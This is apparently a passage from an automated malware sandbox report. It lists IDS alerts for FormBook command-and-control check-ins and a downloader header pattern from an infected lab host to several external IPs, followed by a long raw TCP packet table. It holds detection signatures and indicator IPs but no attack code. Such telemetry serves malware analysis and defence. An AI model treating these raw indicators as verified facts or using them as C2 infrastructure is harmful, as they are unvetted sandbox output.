                                                            2024-08-28T14:04:58.730195+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214977380192.168.2.4142.250.186.147
                                                            2024-08-28T14:04:26.541437+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976380192.168.2.434.149.87.45
                                                            2024-08-28T14:05:04.819790+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977480192.168.2.4203.161.41.205
                                                            2024-08-28T14:04:55.821968+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977280192.168.2.4142.250.186.147
                                                            2024-08-28T14:05:07.328379+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977580192.168.2.4203.161.41.205
                                                            2024-08-28T14:03:50.835146+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214975380192.168.2.45.78.41.174
                                                            2024-08-28T14:03:57.553845+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975480192.168.2.43.33.130.190
                                                            2024-08-28T14:04:13.389766+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975980192.168.2.4188.114.96.3
                                                            2024-08-28T14:04:18.440443+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214976180192.168.2.4188.114.96.3
                                                            2024-08-28T14:04:31.580553+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214976580192.168.2.434.149.87.45
                                                            2024-08-28T14:04:01.584087+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975680192.168.2.43.33.130.190
                                                            2024-08-28T14:01:56.654315+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34974180192.168.2.4178.237.33.50
                                                            2024-08-28T14:03:30.124862+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974880192.168.2.4162.241.2.92
                                                            2024-08-28T14:04:38.000818+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976680192.168.2.43.33.130.190
                                                            2024-08-28T14:03:48.309831+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.45.78.41.174

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 28, 2024 14:01:11.415298939 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.415371895 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:11.415465117 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.423266888 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.423288107 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:11.908157110 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:11.908235073 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.912470102 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.912491083 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:11.912756920 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:11.925040960 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:11.972500086 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430176973 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430214882 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430237055 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430260897 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430284977 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430310965 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430310965 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.430334091 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430344105 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430361032 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.430377960 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.430381060 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430392027 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.430428028 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.434987068 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435031891 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435054064 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435075998 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435081959 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.435098886 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435116053 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.435432911 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435482979 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.435493946 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435520887 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.435560942 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.435566902 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436388016 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436429024 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436435938 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.436444044 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436471939 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436503887 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.436510086 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.436547041 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.437325001 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437364101 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437383890 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437406063 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.437416077 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437459946 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.437820911 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437889099 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437910080 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437931061 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.437932968 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437944889 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.437968969 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.440105915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.440131903 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.440161943 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.440170050 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.440202951 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.440409899 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441025972 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441046953 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441066980 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441076994 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.441085100 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441132069 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.441803932 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.441864967 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.441873074 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.442512989 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.442565918 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.442574024 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.442617893 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.442785978 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.443144083 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.443192959 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.443201065 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.443243027 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.444519997 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.444578886 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.444937944 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.444993973 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445081949 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445136070 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445343018 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445405006 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445780993 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445835114 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445935011 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445961952 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445986986 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445992947 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446002960 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.446297884 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446342945 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.446348906 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446388006 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.447973967 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.448031902 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.448604107 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.448662043 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531232119 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531281948 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531292915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531389952 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531435013 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531462908 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531464100 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531507015 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531517029 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531552076 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531662941 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531733036 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531755924 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531781912 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531833887 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531840086 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531852007 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532147884 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532175064 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532202959 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532211065 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532233953 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532356024 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532406092 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532413006 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532438040 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532455921 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532460928 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532485962 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532576084 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532602072 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532627106 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532634020 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532654047 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532972097 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533047915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533047915 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533061028 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533101082 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533226013 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533250093 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533277035 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533282995 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533299923 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533320904 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533364058 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533370018 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533416033 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533855915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533909082 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533938885 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533971071 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533996105 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534001112 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534012079 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534099102 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534117937 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534146070 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534152985 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534182072 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536062956 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536120892 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536128044 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536173105 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536350965 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536401987 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536412001 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536468983 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622292042 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622332096 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622428894 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622467995 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622535944 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622649908 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622673988 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622714043 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622721910 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622750044 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622766018 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622876883 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622890949 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622944117 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622951031 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622993946 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623119116 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623131037 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623172998 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623179913 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623207092 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623223066 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623456001 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623470068 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623528004 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623536110 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623579025 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623641014 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623653889 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623703003 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.623709917 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.623753071 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624067068 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624080896 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624125957 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624134064 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624165058 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624182940 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624396086 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624408960 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624453068 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624459982 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.624497890 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.624511957 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.714834929 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.714859009 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.714936018 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.714987993 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715006113 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715049982 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715127945 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715145111 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715195894 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715202093 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715226889 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715244055 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715395927 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715414047 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715460062 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715466022 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715509892 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715531111 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715730906 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715747118 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715807915 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715814114 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.715842962 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715864897 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.715981960 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.716027021 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.716056108 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.716058969 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.716083050 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.716104984 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.721970081 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.725415945 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:48.606617928 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:48.606673956 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:48.606800079 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:48.618177891 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:48.618212938 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.085042953 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.085139036 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.135018110 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.135086060 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.135399103 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.135462046 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.140043974 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.180502892 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458350897 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458389044 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458415031 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458434105 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458451986 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.458456993 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458452940 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.458523989 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.458570957 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.458570957 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.458600044 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.459005117 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.459058046 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.459074974 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.459095955 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.459122896 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.459157944 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.459623098 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.459683895 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.459697962 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.459768057 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.462995052 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.463171959 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.546758890 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.546809912 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.546837091 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.546834946 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.546860933 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.546916008 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.546956062 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.546956062 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.546957016 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.546966076 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547022104 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.547022104 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.547036886 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547086954 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.547568083 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547606945 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547626972 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.547641039 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547669888 CEST49737443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:49.547693014 CEST44349737104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:49.547699928 CEST49737443192.168.2.4104.21.62.202
